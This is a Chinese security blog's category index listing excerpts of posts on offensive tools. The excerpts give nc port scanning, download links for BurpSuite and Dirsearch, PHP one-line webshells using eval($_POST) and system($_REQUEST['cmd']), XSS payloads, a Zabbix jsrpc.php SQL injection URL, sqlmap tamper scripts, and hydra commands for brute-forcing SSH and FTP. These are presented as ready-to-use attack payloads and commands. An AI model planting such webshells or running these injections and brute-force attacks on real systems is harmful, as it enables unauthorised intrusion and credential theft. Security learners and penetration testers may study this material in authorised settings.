随笔分类 - 安全工具以及使用方法
常用安全工具以及使用方法。
摘要:端口扫描: nc -v ip port 指定端口nc -v -w ip -z 1-65536 指定端口范围nc -nvz 127.0.0.1 1-100 nc 使用全链接方式扫描端口(TCP扫描)nc -nvzu 192.168.1.105 1-1024 udp扫描 -v 输出详细报告 -w tim
阅读全文
摘要:BurpSuite2021.6 链接:https://pan.baidu.com/s/1JGmkj_yMfyATpT1rno85OA 提取码:1234 Dirsearch 链接:https://pan.baidu.com/s/1YJnFQtuBI_JEbESuRPeawg 提取码:qrsd 弱口令检
阅读全文
摘要:php的一句话木马: <?php phpinfo();?> <?php @eval($_POST['a']);?> <?php eval(@$_POST['a']); ?> <?php eval($_POST[a])?> <?php system($_REQUEST['cmd']);?> <?php
阅读全文
摘要:scirpt标签用于定义客户端脚本,比如JavaScript <script>alert(1);</script> <script>alert("xss");</script> img标签定义HTML页面中的图像 <imgsrc=1onerror=alert(1);> <imgsrc=1onerro
阅读全文
摘要:etc/shadow: 文件的格式为: {用户名}:{加密后的口令密码}:{口令最后修改时间距原点(1970-1-1)的天数}:{口令最小修改间隔(防止修改口令,如果时限未到,将恢复至旧口令):{口令最大修改间隔}:{口令失效前的警告天数}:{账户不活动天数}:{账号失效天数}:{保留} 查看加密方
阅读全文
摘要:利用方法: 在url后面添加如下内容: jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatex
阅读全文
摘要:python3 Dirsearch.py -u https://www.xxx.com -e* 需要自定义字典的话 加参数 -w db/DIR.txt -u 指定网址 -e 指定网站语言 -w 指定字典 -r 递归目录(跑出目录后,继续跑目录下面的目录) --random-agents 使用随机UA
阅读全文
摘要:支持的数据库 编号 脚本名称 作用 实现方式 all 1 apostrophemask.py 用utf8代替引号 ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' 2 base64encode.py 用base64编码替换 ("1' AN
阅读全文
摘要:网上大佬写的贼全。拿来看看。 https://www.cnblogs.com/nieliangcai/p/6692296.html
阅读全文
摘要:知道用户名或密码用小写,不知道用大写加字典 破解ssh: hydra -l root -P passwd.txt -t 10 -vV -e ns 192.168.190.136 ssh hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 破解ftp:
阅读全文
摘要:nmap(选项)(参数) O:激活操作探测; -P0:值进行扫描,不ping主机; -PT:是同TCP的ping; -sV:探测服务版本信息; -sP:ping扫描,仅发现目标主机是否存活; -sS:TCP SYN扫描(半开放式扫描,扫描速度高且隐蔽性好) -sT: TCP 连接扫描(最基础,最稳定
阅读全文
摘要:sqlmap简介 sqlmap支持五种不同的注入模式: 基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回
阅读全文
